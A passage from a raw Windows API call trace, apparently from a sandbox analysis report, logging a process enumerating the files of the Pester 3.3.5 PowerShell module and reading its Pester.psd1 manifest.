ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0170.851] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0170.851] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0170.851] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0170.851] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0170.852] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0170.852] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0170.852] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0170.852] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0170.852] FindClose (in: hFindFile=0x1e35146b060 | out: hFindFile=0x1e35146b060) returned 1 [0170.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8a430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0170.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a880) returned 1 [0170.853] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0xb156f8a960 | out: lpFileInformation=0xb156f8a960*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0170.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a840) returned 1 [0170.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a8d0) returned 1 [0170.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8a3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0170.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8a5e0 | out: lpFindFileData=0xb156f8a5e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a820 [0170.854] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.854] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0170.854] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0170.854] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0170.855] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0170.855] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0170.855] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0170.855] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0170.855] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0170.856] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0170.856] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0170.856] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0170.856] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0170.856] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0170.857] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0170.857] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.857] FindClose (in: hFindFile=0x1e35146a820 | out: hFindFile=0x1e35146a820) returned 1 [0170.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a800) returned 1 [0170.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7c0) returned 1 [0170.857] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0170.857] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0170.857] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0170.858] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0170.858] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0170.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8a5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0170.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.858] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0xb156f8aaf0 | out: lpFileInformation=0xb156f8aaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0170.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8a540, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0170.858] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8a770 | out: lpFindFileData=0xb156f8a770*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146ae20 [0170.858] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a730 | out: lpFindFileData=0xb156f8a730*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.858] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a730 | out: lpFindFileData=0xb156f8a730*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0170.858] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a730 | out: lpFindFileData=0xb156f8a730*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.859] FindClose (in: hFindFile=0x1e35146ae20 | out: hFindFile=0x1e35146ae20) returned 1 [0170.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a990) returned 1 [0170.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a950) returned 1 [0170.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8a630, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0170.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa80) returned 1 [0170.859] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ab60 | out: lpFileInformation=0xb156f8ab60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0170.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa40) returned 1 [0170.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8a340, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0170.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a820) returned 1 [0170.859] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0170.860] GetFileType (hFile=0x458) returned 0x1 [0170.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a790) returned 1 [0170.860] GetFileType (hFile=0x458) returned 0x1 [0170.860] ReadFile (in: hFile=0x458, lpBuffer=0x1e33963b7b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33963b7b8*, lpNumberOfBytesRead=0xb156f8a8f8*=0x1000, lpOverlapped=0x0) returned 1 [0170.860] ReadFile (in: hFile=0x458, lpBuffer=0x1e33963b7b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33963b7b8*, lpNumberOfBytesRead=0xb156f8a8f8*=0x1000, lpOverlapped=0x0) returned 1 [0170.860] ReadFile (in: hFile=0x458, lpBuffer=0x1e33963b7b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33963b7b8*, lpNumberOfBytesRead=0xb156f8a8f8*=0x1000, lpOverlapped=0x0) returned 1 [0170.860] ReadFile (in: hFile=0x458, lpBuffer=0x1e33963b7b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33963b7b8*, lpNumberOfBytesRead=0xb156f8a8f8*=0x5e5, lpOverlapped=0x0) returned 1 [0170.860] ReadFile (in: hFile=0x458, lpBuffer=0x1e33963acdd, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33963acdd*, lpNumberOfBytesRead=0xb156f8a8f8*=0x0, lpOverlapped=0x0) returned 1 [0170.860] ReadFile (in: hFile=0x458, lpBuffer=0x1e33963b7b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a8f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33963b7b8*, lpNumberOfBytesRead=0xb156f8a8f8*=0x0, lpOverlapped=0x0) returned 1 [0170.860] CloseHandle (hObject=0x458) returned 1 [0170.865] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0170.865] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0170.865] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0170.865] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0170.865] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" 